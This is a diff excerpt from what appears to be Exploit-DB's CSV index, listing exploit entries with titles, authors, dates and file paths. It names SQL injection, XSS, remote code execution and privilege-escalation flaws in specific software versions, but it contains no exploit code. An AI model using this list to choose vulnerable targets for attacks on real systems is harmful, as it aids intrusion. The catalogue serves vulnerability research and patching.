49042,exploits/windows/local/49042.txt,"SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path",2020-11-13,"Mara Ramirez",local,windows,
49043,exploits/windows/local/49043.txt,"IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path",2020-11-13,"Isabel Lopez",local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -40852,6 +40855,12 @@ id,file,description,date,author,type,platform,port
49031,exploits/php/webapps/49031.txt,"CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)",2020-11-11,"Fatih Çelik",webapps,php,
49032,exploits/php/webapps/49032.txt,"Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection",2020-11-12,"Sarang Tumne",webapps,php,
49033,exploits/php/webapps/49033.txt,"Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection",2020-11-12,"Abdulazeez Alaseeri",webapps,php,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,
49038,exploits/hardware/webapps/49038.rb,"Citrix ADC NetScaler - Local File Inclusion (Metasploit)",2020-11-13,"RAMELLA Sebastien",webapps,hardware,
49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,
49040,exploits/multiple/webapps/49040.txt,"Touchbase.io 1.10 - Stored Cross Site Scripting",2020-11-13,"Simran Sankhala",webapps,multiple,
49044,exploits/php/webapps/49044.txt,"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure",2020-11-13,"Jinson Varghese Behanan",webapps,php,
49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
@ -42968,6 +42977,7 @@ id,file,description,date,author,type,platform,port
48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,
48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
49036,exploits/hardware/webapps/49036.rb,"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)",2020-11-13,b1ack0wl,webapps,hardware,
48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,

Can't render this file because it is too large.